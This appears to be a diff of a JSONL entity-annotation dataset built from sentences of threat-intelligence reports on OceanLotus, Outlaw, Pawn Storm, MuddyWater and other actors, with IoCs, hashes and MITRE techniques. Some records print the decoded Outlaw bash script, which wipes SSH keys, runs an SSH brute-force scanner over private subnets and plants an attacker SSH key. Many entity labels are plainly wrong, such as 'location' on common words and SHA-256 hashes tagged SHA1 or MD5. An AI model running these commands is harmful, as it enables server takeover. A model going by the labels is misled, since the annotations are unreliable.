-{"id":7320,"text":"The domain \"mykessef[.]com\" was used for the C&C server earlier.","entities":[],"relations":[],"Comments":[]} -{"id":7321,"text":" Figure 20.","entities":[],"relations":[],"Comments":[]} -{"id":7322,"text":"Domain history of mykessef[.]com based on Whois Lookup ","entities":[],"relations":[],"Comments":[]} -{"id":7325,"text":"Figure 21.","entities":[],"relations":[],"Comments":[]} -{"id":7326,"text":"idtpl[.]org registration information based on Whois Lookup But from the middle of July 2020, its IP address changed to 185[.]117[.]88[.]91. Figure 22. Domain History of idtpl[.]org as seen on VirusTotal","entities":[{"id":22803,"label":"IPV4","start_offset":123,"end_offset":142}],"relations":[],"Comments":[]} -{"id":7327,"text":" Recommendations","entities":[],"relations":[],"Comments":[]} -{"id":7328,"text":"Threat groups such as OceanLotus are actively updating malware variants in attempts to evade detection and improve persistence.","entities":[{"id":22805,"label":"threat-actor","start_offset":22,"end_offset":32},{"id":22806,"label":"location","start_offset":33,"end_offset":36},{"id":22807,"label":"location","start_offset":103,"end_offset":106}],"relations":[],"Comments":[]} -{"id":7330,"text":"Indicators of Compromise SHA-256 Filename\/Description Trend Micro Pattern Detection cfa3d506361920f9e1db9d8324dfbb3a9c79723e702d70c3dc8f51825c171420 ALL%20tim%20nha%20Chi%20Ngoc%20Canada.zip Backdoor.MacOS.OCEANLOTUS.F 48e3609f543ea4a8de0c9375fa665ceb6d2dfc0085ee90fa22ffaced0c770c4f ALL tim","entities":[{"id":22819,"label":"location","start_offset":63,"end_offset":68},{"id":22820,"label":"SHA2","start_offset":88,"end_offset":152},{"id":22821,"label":"MD5","start_offset":227,"end_offset":291}],"relations":[],"Comments":[]} -{"id":7331,"text":"nha","entities":[],"relations":[],"Comments":[]} -{"id":7332,"text":"Chi Ngoc Canada Backdoor.SH.OCEANLOTUS.F 05e5ba08be06f2d0e2da294de4c559ca33c4c28534919e5f2f6fc51aed4956e3 2nd stage fat binary Backdoor.MacOS.OCEANLOTUS.F fd7e51e3f3240b550f0405a67e98a97d86747a8a07218e8150d2c2946141f737 3rd stage fat binary Backdoor.MacOS.OCEANLOTUS.F Domains mihannevis[.]com mykessef[.]com idtpl[.]org MITRE TTP Tactic ID Name","entities":[{"id":22822,"label":"location","start_offset":0,"end_offset":3},{"id":22823,"label":"location","start_offset":9,"end_offset":15},{"id":22824,"label":"SHA1","start_offset":43,"end_offset":107},{"id":22825,"label":"SHA2","start_offset":160,"end_offset":224}],"relations":[],"Comments":[]} -{"id":7333,"text":" Description Defense Evasion","entities":[],"relations":[],"Comments":[]} -{"id":7334,"text":"T1070.004 File Deletion The app bundle and dropper delete themselves after execution T1222.002 Linux and Mac File and Directory Permissions Modification ","entities":[{"id":22826,"label":"attack-pattern","start_offset":11,"end_offset":24},{"id":22827,"label":"location","start_offset":41,"end_offset":44},{"id":22828,"label":"location","start_offset":105,"end_offset":108},{"id":22829,"label":"location","start_offset":118,"end_offset":121}],"relations":[],"Comments":[]} -{"id":7335,"text":"The backdoor changes the permission of the file it wants to execute to +x T1027 Obfuscated Files or Information Readable strings were encrypted T1036.005 Masquerading: Match Legitimate Name or Location The app bundle is disguised as a doc file to trick users into executing it T1070.006 Indicator Removal","entities":[{"id":22830,"label":"attack-pattern","start_offset":82,"end_offset":113},{"id":22831,"label":"attack-pattern","start_offset":159,"end_offset":171}],"relations":[],"Comments":[]} -{"id":7336,"text":"on Host","entities":[],"relations":[],"Comments":[]} -{"id":7337,"text":"Timestomp The backdoor modifies the date and time of the dropped files using the “touch” command Discovery T1082 System Information Discovery The backdoor collects various information to send to the C&C server Collection T1560.003 Archive Collected Data: Archive via Custom Method The backdoor encrypts the data before exfiltration Command and Control T1095 Non-Application Layer Protocol","entities":[{"id":22832,"label":"attack-pattern","start_offset":0,"end_offset":9},{"id":22833,"label":"location","start_offset":37,"end_offset":41},{"id":22834,"label":"location","start_offset":42,"end_offset":45},{"id":22835,"label":"location","start_offset":46,"end_offset":50},{"id":22836,"label":"attack-pattern","start_offset":117,"end_offset":145},{"id":22837,"label":"location","start_offset":350,"end_offset":353}],"relations":[],"Comments":[]} -{"id":7339,"text":"As we’ve observed with cybercriminal groups that aim to maximize profits for every campaign, silence doesn’t necessarily mean inactivity.","entities":[{"id":22839,"label":"location","start_offset":83,"end_offset":91},{"id":22840,"label":"malware","start_offset":93,"end_offset":100}],"relations":[],"Comments":[]} -{"id":7340,"text":"It appears hacking group Outlaw, which has been silent for the past few months, was simply developing their toolkit for illicit income sources.","entities":[],"relations":[],"Comments":[]} -{"id":7341,"text":"While they have been quiet since our June analysis, we observed an increase in the group’s activities in December, with updates on the kits’ capabilities reminiscent of their previous attacks.","entities":[],"relations":[],"Comments":[]} -{"id":7347,"text":"Routine","entities":[],"relations":[],"Comments":[]} -{"id":7353,"text":"The honeynet graphs, which show activity peaks associated with specific actions, also suggest that the scans were timed.","entities":[],"relations":[],"Comments":[]} -{"id":7355,"text":"The attackers could hide their activities if they noted the business hours of the intended targets and performed the actions coinciding with said times.","entities":[{"id":22875,"label":"TIME","start_offset":56,"end_offset":74},{"id":22876,"label":"location","start_offset":99,"end_offset":102}],"relations":[],"Comments":[]} -{"id":7356,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} -{"id":7357,"text":"Anomalous properties of a command detected from traffic","entities":[],"relations":[],"Comments":[]} -{"id":7360,"text":"They attempted to evade traffic inspection by encoding the code for the scanner with base-64.","entities":[],"relations":[],"Comments":[]} +{"id":2699,"text":" In August 2021, a Russian blogger published a 22-minute interview with an alleged representative of the group behind LockBit 2.0 called \u201cLockBitSupp\u201d on a YouTube channel called \u201cRussian-language open source intelligence (OSINT).\u201d","entities":[{"id":47935,"label":"location","start_offset":18,"end_offset":26},{"id":47934,"label":"TIME","start_offset":4,"end_offset":15},{"id":47936,"label":"threat-actor","start_offset":118,"end_offset":129},{"id":47937,"label":"SOFTWARE","start_offset":156,"end_offset":163}],"relations":[],"Comments":[]} +{"id":450,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} +{"id":2142,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) ","entities":[],"relations":[],"Comments":[]} +{"id":3733,"text":"The CISA Alert also calls out CVE-2022-22972 and CVE-2022-22973 \u2013 published on the same day and affecting the same products \u2013 as being highly likely to be exploited.","entities":[{"id":49540,"label":"identity","start_offset":4,"end_offset":8},{"id":49542,"label":"vulnerability","start_offset":49,"end_offset":63},{"id":49541,"label":"vulnerability","start_offset":30,"end_offset":44}],"relations":[],"Comments":[]} +{"id":3400,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0 Silverlight.exe","entities":[{"id":10263,"label":"malware","start_offset":0,"end_offset":11},{"id":10264,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49064,"label":"malware","start_offset":20,"end_offset":44},{"id":49065,"label":"FILEPATH","start_offset":112,"end_offset":127}],"relations":[{"id":636,"from_id":10263,"to_id":49064,"type":"duplicate-of"},{"id":637,"from_id":49065,"to_id":10264,"type":"duplicate-of"},{"id":638,"from_id":10264,"to_id":49064,"type":"indicates"},{"id":639,"from_id":49065,"to_id":49064,"type":"indicates"}],"Comments":[]} +{"id":8432,"text":"On Gmail, we recommend certain Gmail security precautions to prevent spoofing, phishing, and spam.","entities":[{"id":25986,"label":"location","start_offset":37,"end_offset":45},{"id":25987,"label":"attack-pattern","start_offset":79,"end_offset":87},{"id":25988,"label":"location","start_offset":89,"end_offset":92}],"relations":[],"Comments":[]} +{"id":941,"text":"These apps are not hosted inside the Google Play store, but are distributed via third party distribution mechanisms in China.","entities":[{"id":46453,"label":"SOFTWARE","start_offset":37,"end_offset":54},{"id":46454,"label":"location","start_offset":119,"end_offset":124}],"relations":[],"Comments":[]} +{"id":4397,"text":"Accept-Encoding: gzip Connection: Keep-Alive","entities":[],"relations":[],"Comments":[]} +{"id":10265,"text":"The different versions of gdrive.exe are almost identical, with a minor addition to the file 2060f1e108f5feb5790320c38931e3dc6c7224edf925bf6f1840351578bbf9cc of base64 encoding on the victim\u2019s id.","entities":[{"id":31369,"label":"location","start_offset":37,"end_offset":40},{"id":31370,"label":"location","start_offset":66,"end_offset":71},{"id":31371,"label":"SHA2","start_offset":93,"end_offset":157}],"relations":[],"Comments":[]} +{"id":8967,"text":"Unverified developer warning with the \u201cOpen\u201d button enabled","entities":[],"relations":[],"Comments":[]} +{"id":3885,"text":"The guidance provides steps to prepare for, mitigate against, and respond to attacks.","entities":[],"relations":[],"Comments":[]} +{"id":1282,"text":"Figure 7 shows the relationship between these backdoors and their respective command and control servers.","entities":[],"relations":[],"Comments":[]} +{"id":464,"text":"To get that list of domains that the malware will use, defenders have to decode the algorithm which can be difficult.","entities":[],"relations":[],"Comments":[]} +{"id":4148,"text":" Figure 12.","entities":[],"relations":[],"Comments":[]} +{"id":6332,"text":"It was uploaded to VirusTotal on May 19, 2022, from Sri Lanka.","entities":[],"relations":[],"Comments":[]} +{"id":440,"text":"That site\u2019s owner is the attacker.","entities":[],"relations":[],"Comments":[]} +{"id":8514,"text":"We blocked 1.6M messages to targets, displayed ~62K Safe Browsing phishing page warnings, blocked 2.4K files, and successfully restored ~4K accounts.","entities":[{"id":26294,"label":"location","start_offset":52,"end_offset":56},{"id":26295,"label":"attack-pattern","start_offset":66,"end_offset":74},{"id":26296,"label":"location","start_offset":75,"end_offset":79},{"id":26299,"label":"location","start_offset":110,"end_offset":113}],"relations":[],"Comments":[]} +{"id":1153,"text":" The second mutex appears to be a concerted effort to make the mutex seem \u201cmore random\u201d than the first.","entities":[],"relations":[],"Comments":[]} +{"id":3349,"text":"The domains and the PDB string have been mentioned in a recent report and have been attributed to the Winnti Group.","entities":[{"id":48962,"label":"threat-actor","start_offset":102,"end_offset":114}],"relations":[],"Comments":[]} +{"id":10263,"text":"The message box that decrypt.exe displays ","entities":[],"relations":[],"Comments":[]} +{"id":11267,"text":"Gather information on an endpoint Gathers information from the endpoint such as the current logged on user, operating system details, IP address, hostname, mac address","entities":[],"relations":[],"Comments":[]} +{"id":3719,"text":"In both Carbanak and FIN7 attacks, communication with users\u2019 compromised systems is done through bypassing firewalls or network detection systems via commonly used ports, using connection proxies to avoid direct connections to the threat group\u2019s infrastructure, employing the command-and-control channel to remotely copy files from an external system, blending in with existing network traffic by using standard application layer protocol, and taking advantage of standard cryptographic protocol to disguise command-and-control traffic.","entities":[{"id":49518,"label":"threat-actor","start_offset":8,"end_offset":16},{"id":49519,"label":"threat-actor","start_offset":21,"end_offset":25},{"id":49520,"label":"attack-pattern","start_offset":97,"end_offset":116},{"id":49521,"label":"attack-pattern","start_offset":171,"end_offset":195},{"id":49522,"label":"attack-pattern","start_offset":352,"end_offset":393}],"relations":[{"id":817,"from_id":49518,"to_id":49519,"type":"related-to"},{"id":818,"from_id":49519,"to_id":49520,"type":"uses"},{"id":819,"from_id":49519,"to_id":49521,"type":"uses"},{"id":820,"from_id":49519,"to_id":49522,"type":"uses"}],"Comments":[]} +{"id":2492,"text":"Unit 42 researchers are proactively monitoring info related to other recently disclosed Spring vulnerabilities and will proceed to provide coverage as soon as more info has become available.","entities":[{"id":7440,"label":"identity","start_offset":0,"end_offset":7},{"id":47576,"label":"SOFTWARE","start_offset":88,"end_offset":94}],"relations":[],"Comments":[]} +{"id":1708,"text":" Last year we highlighted two malware families on this blog: CryptoWall 2.0 and Dyreza\/Dyre.","entities":[{"id":46883,"label":"malware","start_offset":61,"end_offset":75},{"id":46884,"label":"malware","start_offset":80,"end_offset":86},{"id":46885,"label":"malware","start_offset":87,"end_offset":91}],"relations":[{"id":247,"from_id":46884,"to_id":46885,"type":"duplicate-of"}],"Comments":[]} +{"id":5668,"text":"This finding sparked an investigation that led us to identify, with high confidence, multiple online services offered by the individuals operating the Glupteba botnet.","entities":[{"id":17458,"label":"location","start_offset":73,"end_offset":83},{"id":17459,"label":"malware","start_offset":151,"end_offset":159}],"relations":[],"Comments":[]} +{"id":1650,"text":"While many users breeze past the list of permissions required when installing new apps, readers of this blog should ask themselves, \u201cDoes my electronic bible need to read my SMS messages?\u201d Sign up to receive the latest news, cyber threat intelligence and research from us ","entities":[],"relations":[],"Comments":[]} +{"id":2893,"text":"local7","entities":[],"relations":[],"Comments":[]} +{"id":10000,"text":"It is a variant of PlugX malware, and connects to the same C&C server (66[.]42[.]37[.]101). Figure 8.","entities":[{"id":30524,"label":"malware","start_offset":19,"end_offset":24},{"id":30525,"label":"location","start_offset":34,"end_offset":37},{"id":30526,"label":"location","start_offset":54,"end_offset":58},{"id":30527,"label":"IPV4","start_offset":71,"end_offset":89}],"relations":[],"Comments":[]} +{"id":11266,"text":"Delete email message Permanently deletes the specified email message from the user\u2019s mailbox","entities":[],"relations":[],"Comments":[]} +{"id":425,"text":"Because of this, people can earn digital currency credit in exchange for the use of their computing resources to power that digital currency\u2019s infrastructure.","entities":[],"relations":[],"Comments":[]} +{"id":528,"text":"32-bit EXE is the most common ransomware file type we observed.","entities":[],"relations":[],"Comments":[]} +{"id":980,"text":"Some of the infected apps purport to contain or display adult content.","entities":[],"relations":[],"Comments":[]} +{"id":2253,"text":"The results of these commands are uploaded to the C2 server.","entities":[],"relations":[],"Comments":[]} +{"id":9894,"text":"Job Opportunity SIPCHEM 7\/30\/18 jobs@sipchem.ga","entities":[{"id":30202,"label":"location","start_offset":0,"end_offset":3},{"id":30203,"label":"location","start_offset":4,"end_offset":15},{"id":30204,"label":"EMAIL","start_offset":32,"end_offset":47}],"relations":[],"Comments":[]} +{"id":6968,"text":" Figure 13.","entities":[],"relations":[],"Comments":[]} {"id":7362,"text":"Decoding the scanner revealed the following codes: #!\/bin\/bash cd \/tmp rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix rm -rf .X19-unix mkdir .X19-unix cd .X19-unix mv \/var\/tmp\/dota3.tar.gz dota3.tar.gz tar xf dota3.tar.gz sleep 3s && cd \/tmp\/.X19-unix\/.rsync\/c nohup \/tmp\/.X19-unix\/.rsync\/c\/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 \/tmp\/up.txt 192.168 >> \/dev\/null 2>1& sleep 8m && nohup \/tmp\/.X19-unix\/.rsync\/c\/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0","entities":[],"relations":[],"Comments":[]} -{"id":7363,"text":"\/tmp","entities":[],"relations":[],"Comments":[]} -{"id":7364,"text":"\/up.txt 172.16","entities":[],"relations":[],"Comments":[]} -{"id":7365,"text":"> \/dev\/null 2>1& sleep 20m && cd ..; \/tmp\/.X19-unix\/.rsync\/initall 2>1& exit 0 ","entities":[],"relations":[],"Comments":[]} -{"id":7366,"text":"The kit we found is in tgz format, though we have observed some samples disguised as png or jpg.","entities":[],"relations":[],"Comments":[]} -{"id":7368,"text":"The tsm binary then runs in the background, forwarding a series of error messages to \/dev\/null to keep the code running, ensuring the continuous execution of the code referenced with a set of parameters \/tmp\/up.txt.","entities":[],"relations":[],"Comments":[]} -{"id":7369,"text":"The script then waits 20 minutes before it runs the wrapper script initall: 2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a initall Figure 2.","entities":[{"id":22893,"label":"location","start_offset":16,"end_offset":21},{"id":22894,"label":"TIME","start_offset":22,"end_offset":32},{"id":22895,"label":"SHA2","start_offset":76,"end_offset":140}],"relations":[],"Comments":[]} -{"id":7370,"text":"Running the initall wrapper script","entities":[],"relations":[],"Comments":[]} -{"id":7371,"text":"Another variant executes a set of commands once a system is successfully compromised.","entities":[],"relations":[],"Comments":[]} -{"id":7374,"text":"head -n 1 cat \/proc\/cpuinfo | grep name |","entities":[],"relations":[],"Comments":[]} -{"id":7375,"text":"head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","entities":[],"relations":[],"Comments":[]} -{"id":7378,"text":"echo \"root 123\" > \/tmp\/up.txt rm -rf \/var\/tmp\/dota* cat \/var\/tmp\/.systemcache436621 echo \"1\" > \/var\/tmp\/.systemcache436621 cat \/var\/tmp\/.systemcache436621 sleep 15s && cd \/var\/tmp; echo \"IyEvYmluL2Jhc2gKY2QgL3RtcAk..... cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3N.....","entities":[{"id":22909,"label":"location","start_offset":0,"end_offset":4},{"id":22910,"label":"location","start_offset":6,"end_offset":10},{"id":22911,"label":"location","start_offset":103,"end_offset":107},{"id":22912,"label":"location","start_offset":150,"end_offset":154},{"id":22913,"label":"location","start_offset":247,"end_offset":251},{"id":22914,"label":"location","start_offset":334,"end_offset":338},{"id":22915,"label":"identity","start_offset":344,"end_offset":347}],"relations":[],"Comments":[]} -{"id":7381,"text":"Based on a bashtemp directory of the latest sample we found, there are other compiled ELF scripts, named init and init2, that loops the kit to keep running: 0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6 init Figure 3. Running the init ELF script 93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494 init2 Figure 4.","entities":[{"id":22919,"label":"location","start_offset":44,"end_offset":50},{"id":22920,"label":"location","start_offset":67,"end_offset":70},{"id":22921,"label":"location","start_offset":110,"end_offset":113},{"id":22922,"label":"SHA2","start_offset":157,"end_offset":221},{"id":22924,"label":"SHA1","start_offset":267,"end_offset":331}],"relations":[],"Comments":[]} -{"id":7383,"text":"We also found the init0 script running; the script cleans out all miners regardless of its origin.","entities":[],"relations":[],"Comments":[]} -{"id":7384,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} -{"id":7385,"text":"The init0 script running It then resets cron and removes possible cache files from other programs, starts scripts and binaries a, init0, and start, and sets the persistence by modifying the crontab.","entities":[{"id":22931,"label":"threat-actor","start_offset":40,"end_offset":44},{"id":22932,"label":"location","start_offset":45,"end_offset":48},{"id":22933,"label":"location","start_offset":66,"end_offset":71},{"id":22934,"label":"location","start_offset":114,"end_offset":117},{"id":22935,"label":"location","start_offset":137,"end_offset":140},{"id":22936,"label":"location","start_offset":141,"end_offset":146},{"id":22937,"label":"location","start_offset":148,"end_offset":151}],"relations":[],"Comments":[]} -{"id":7388,"text":"This allows the malicious activity to evade detection.","entities":[],"relations":[],"Comments":[]} -{"id":7389,"text":" Figure 6. Current variables for rsync (the Shellbot) Figure 7. Connects to C&C to send current control variables","entities":[],"relations":[],"Comments":[]} -{"id":7412,"text":"Trend Micro solutions","entities":[],"relations":[],"Comments":[]} -{"id":7418,"text":"Indicators of Compromise (IoCs) SHA256 Description Detection Name 1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa Cryptocurrency miner Trojan.SH.MALXMR.UWEJP b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d Shellbot Backdoor.SH.SHELLBOT.AA 620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976 Tool Trojan.Linux.SSHBRUTE.B fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL32 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79 Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL64 URLs 159[.]203[.]141[.]208 104[.]236[.]192[.]6 45[.]9[.]148[.]129:80 Miner pool 45[.]9[.]148[.]125:80 Miner pool http:\/\/www[.]minpop[.]com\/sk12pack\/idents.php Command and control http:\/\/www[.]minpop[.]com\/sk12pack\/names.php Command and control MITRE ATT&CK Matrix Tags Malware | APT & Targeted Attacks | Endpoints | IoT | Research | Network","entities":[{"id":23053,"label":"SHA2","start_offset":67,"end_offset":131},{"id":23054,"label":"location","start_offset":147,"end_offset":152},{"id":23055,"label":"MD5","start_offset":176,"end_offset":240},{"id":23056,"label":"SHA1","start_offset":274,"end_offset":338},{"id":23057,"label":"location","start_offset":339,"end_offset":343},{"id":23058,"label":"SHA1","start_offset":368,"end_offset":432},{"id":23059,"label":"location","start_offset":448,"end_offset":453},{"id":23060,"label":"malware","start_offset":454,"end_offset":463},{"id":23061,"label":"SHA2","start_offset":485,"end_offset":549},{"id":23062,"label":"location","start_offset":565,"end_offset":570},{"id":23063,"label":"malware","start_offset":571,"end_offset":580},{"id":23064,"label":"IPV4","start_offset":610,"end_offset":631},{"id":23065,"label":"IPV4","start_offset":633,"end_offset":652},{"id":23066,"label":"location","start_offset":681,"end_offset":686},{"id":23067,"label":"location","start_offset":687,"end_offset":691},{"id":23068,"label":"location","start_offset":721,"end_offset":726},{"id":23069,"label":"location","start_offset":727,"end_offset":731},{"id":23070,"label":"URL","start_offset":733,"end_offset":758},{"id":23071,"label":"location","start_offset":795,"end_offset":798},{"id":23072,"label":"URL","start_offset":808,"end_offset":833},{"id":23073,"label":"location","start_offset":870,"end_offset":873},{"id":23074,"label":"location","start_offset":930,"end_offset":933}],"relations":[],"Comments":[]} -{"id":7421,"text":"However, they are particularly known for dangerous credential phishing campaigns.","entities":[{"id":23080,"label":"location","start_offset":14,"end_offset":17},{"id":23081,"label":"attack-pattern","start_offset":62,"end_offset":70}],"relations":[],"Comments":[]} -{"id":7422,"text":"In 2016, the group set up aggressive credential phishing attacks against the Democratic National Convention (DNC), German political party Christian Democratic Union (CDU), the parliament and government of Turkey, the parliament of Montenegro, the World Anti-Doping Agency (WADA), Al Jazeera, and many other organizations.","entities":[{"id":23083,"label":"attack-pattern","start_offset":48,"end_offset":56},{"id":23089,"label":"location","start_offset":187,"end_offset":190},{"id":23095,"label":"location","start_offset":292,"end_offset":295},{"id":23096,"label":"location","start_offset":296,"end_offset":300}],"relations":[],"Comments":[]} -{"id":7424,"text":"High profile users of free webmail were targeted by campaigns between 2015 and 2016.","entities":[],"relations":[],"Comments":[]} -{"id":7425,"text":"How is OAuth abused?","entities":[],"relations":[],"Comments":[]} -{"id":7432,"text":"Because of these policies, experienced actor groups like Pawn Storm can take advantage of OAuth for their credential phishing schemes.","entities":[{"id":23115,"label":"location","start_offset":68,"end_offset":71},{"id":23116,"label":"attack-pattern","start_offset":117,"end_offset":125}],"relations":[],"Comments":[]} -{"id":7433,"text":" Figure 1. The sequence of Pawn Storm's OAuth abuse A dissection of Pawn Storm OAuth attacks","entities":[{"id":23118,"label":"threat-actor","start_offset":36,"end_offset":46},{"id":23119,"label":"threat-actor","start_offset":77,"end_offset":87}],"relations":[],"Comments":[]} -{"id":7434,"text":"In these attacks a user would get a message like this:","entities":[],"relations":[],"Comments":[]} -{"id":7435,"text":" Figure 2. A phony email from Pawn Storm","entities":[{"id":23121,"label":"threat-actor","start_offset":40,"end_offset":50}],"relations":[],"Comments":[]} -{"id":7440,"text":"At this point, the user is faced with a legitimate Google site—since all OAuth approvals are done on the site of the service provider—but the application itself is part of a phishing scheme.","entities":[{"id":23131,"label":"location","start_offset":8,"end_offset":13},{"id":23133,"label":"location","start_offset":89,"end_offset":92},{"id":23134,"label":"attack-pattern","start_offset":174,"end_offset":182}],"relations":[],"Comments":[]} -{"id":7442,"text":"After abusing the screening process for OAuth approvals, Pawn Storm’s rogue application operates like every other app accepted by the service provider.","entities":[{"id":23139,"label":"malware","start_offset":70,"end_offset":75}],"relations":[],"Comments":[]} -{"id":7444,"text":"Apart from targeting Gmail users, Pawn Storm has also abused OAuth in credential phishing attacks against high profile Yahoo users.","entities":[{"id":23146,"label":"attack-pattern","start_offset":81,"end_offset":89}],"relations":[],"Comments":[]} -{"id":7445,"text":"Here is an example from 2015 where “McAfee Email Protection” is offered.","entities":[{"id":23149,"label":"identity","start_offset":36,"end_offset":42},{"id":23150,"label":"location","start_offset":49,"end_offset":59}],"relations":[],"Comments":[]} -{"id":7446,"text":" Figure 4.","entities":[],"relations":[],"Comments":[]} -{"id":7447,"text":"A convincing Yahoo phishing email Clicking on the “Try McAfee Email Protection” button would lead to this legitimate website:","entities":[{"id":23153,"label":"attack-pattern","start_offset":19,"end_offset":27},{"id":23154,"label":"identity","start_offset":55,"end_offset":61},{"id":23155,"label":"location","start_offset":68,"end_offset":78},{"id":23156,"label":"threat-actor","start_offset":93,"end_offset":97}],"relations":[],"Comments":[]} -{"id":7448,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} -{"id":7449,"text":"This gives the third party app OAuth access","entities":[],"relations":[],"Comments":[]} -{"id":7450,"text":"However the application is not a service of Yahoo or a legitimate product of McAfee, but a rogue application used by Pawn Storm.","entities":[{"id":23160,"label":"malware","start_offset":91,"end_offset":96}],"relations":[],"Comments":[]} -{"id":7454,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} -{"id":7455,"text":"Overview of Pawn Storm’s Yahoo credential phishing campaigns.","entities":[{"id":23176,"label":"attack-pattern","start_offset":42,"end_offset":50}],"relations":[],"Comments":[]} -{"id":7456,"text":"The blue boxes indicate when Pawn Storm used OAuth lures while red boxes indicate other phishing email strategies OAuth enhances the user experience on the web.","entities":[{"id":23177,"label":"location","start_offset":4,"end_offset":8},{"id":23179,"label":"attack-pattern","start_offset":88,"end_offset":96}],"relations":[],"Comments":[]} -{"id":7461,"text":"These are known rogue applications of Pawn Storm that have been used in credential phishing attacks against high profile users (variants of these names are likely to have been used by Pawn Storm as well): Google Defender Google Email Protection Google Scanner Delivery Service (Yahoo) McAfee Email protection (Yahoo) For more information about Pawn Storm, check out From Espionage to Cyber Propaganda: Pawn Storm's Activities over the Past Two Years.","entities":[{"id":23190,"label":"location","start_offset":6,"end_offset":9},{"id":23191,"label":"malware","start_offset":16,"end_offset":21},{"id":23192,"label":"threat-actor","start_offset":38,"end_offset":48},{"id":23193,"label":"attack-pattern","start_offset":83,"end_offset":91},{"id":23194,"label":"location","start_offset":152,"end_offset":155},{"id":23195,"label":"location","start_offset":156,"end_offset":162},{"id":23196,"label":"threat-actor","start_offset":184,"end_offset":194},{"id":23197,"label":"location","start_offset":235,"end_offset":245},{"id":23198,"label":"identity","start_offset":286,"end_offset":292},{"id":23199,"label":"location","start_offset":299,"end_offset":309},{"id":23201,"label":"threat-actor","start_offset":348,"end_offset":358},{"id":23202,"label":"location","start_offset":360,"end_offset":365},{"id":23204,"label":"threat-actor","start_offset":406,"end_offset":416}],"relations":[],"Comments":[]} -{"id":7463,"text":"We discovered a new campaign targeting organizations in Turkey, Pakistan and Tajikistan that has some similarities with an earlier campaign named MuddyWater, which hit various industries in several countries, primarily in the Middle East and Central Asia.","entities":[{"id":23207,"label":"location","start_offset":20,"end_offset":28},{"id":23210,"label":"location","start_offset":73,"end_offset":76},{"id":23212,"label":"location","start_offset":131,"end_offset":139},{"id":23214,"label":"identity","start_offset":164,"end_offset":167},{"id":23216,"label":"location","start_offset":238,"end_offset":241}],"relations":[],"Comments":[]} -{"id":7468,"text":"Comparing the earlier MuddyWater campaign with this new one reveals some distinct similiarities: 2017 MuddyWater Campaign 2018 “MuddyWater” Campaign Countries of Targeted Organizations Georgia, India, Iraq, Israel, Pakistan, Saudi Arabia Turkey United Arab Emirates, and the USA Turkey, Pakistan, Tajikistan","entities":[{"id":23243,"label":"location","start_offset":33,"end_offset":41},{"id":23244,"label":"location","start_offset":56,"end_offset":59},{"id":23246,"label":"threat-actor","start_offset":105,"end_offset":115},{"id":23247,"label":"location","start_offset":116,"end_offset":124},{"id":23249,"label":"threat-actor","start_offset":131,"end_offset":141},{"id":23250,"label":"location","start_offset":143,"end_offset":151},{"id":23259,"label":"location","start_offset":270,"end_offset":273}],"relations":[],"Comments":[]} -{"id":7472,"text":"Some documents also come with government emblems.","entities":[],"relations":[],"Comments":[]} -{"id":7473,"text":"Dropped Files Visual Basic file and Powershell file; the VBS file executes the PS file","entities":[{"id":23273,"label":"location","start_offset":32,"end_offset":35},{"id":23274,"label":"attack-pattern","start_offset":36,"end_offset":46}],"relations":[],"Comments":[]} -{"id":7477,"text":"Infection Chain Figure 1.","entities":[],"relations":[],"Comments":[]} -{"id":7478,"text":"Infection chain for the attack","entities":[],"relations":[],"Comments":[]} -{"id":7485,"text":"used","entities":[],"relations":[],"Comments":[]} -{"id":7489,"text":"Another example of a header allegedly from the Ministry of Internal Affairs of Tajikistan","entities":[],"relations":[],"Comments":[]} -{"id":7490,"text":"After enabling the macros and the payload executes, two files – an obfuscated Visual Basic script (Detected by Trend Micro as VBS_VALYRIA.DOCT), and an obfuscated PowerShell script (Detected by Trend Mico as TROJ_VALYRIA.PS) — are created in the ProgramData directory placed in randomly-named directories.","entities":[{"id":23313,"label":"location","start_offset":26,"end_offset":29},{"id":23315,"label":"location","start_offset":118,"end_offset":123},{"id":23316,"label":"location","start_offset":146,"end_offset":149},{"id":23317,"label":"attack-pattern","start_offset":164,"end_offset":174},{"id":23318,"label":"location","start_offset":201,"end_offset":205},{"id":23319,"label":"location","start_offset":228,"end_offset":231}],"relations":[],"Comments":[]} -{"id":7491,"text":"The purpose of the .VBS script is to execute the PowerShell script.","entities":[{"id":23320,"label":"attack-pattern","start_offset":49,"end_offset":59}],"relations":[],"Comments":[]} -{"id":7492,"text":"The path to the VBS script is added to the task scheduler as a form of persistence.","entities":[],"relations":[],"Comments":[]} -{"id":7493,"text":"Figure 5.","entities":[],"relations":[],"Comments":[]} -{"id":7500,"text":"The PowerShell script, which employs several layers of obfuscation, is divided into three parts.","entities":[{"id":23336,"label":"attack-pattern","start_offset":4,"end_offset":14}],"relations":[],"Comments":[]} -{"id":7502,"text":"The configuration portion of the PowerShell script","entities":[{"id":23343,"label":"attack-pattern","start_offset":33,"end_offset":43}],"relations":[],"Comments":[]} -{"id":7503,"text":"The second part contains functions related to the encryption, which is a standard RSA encryption with very small 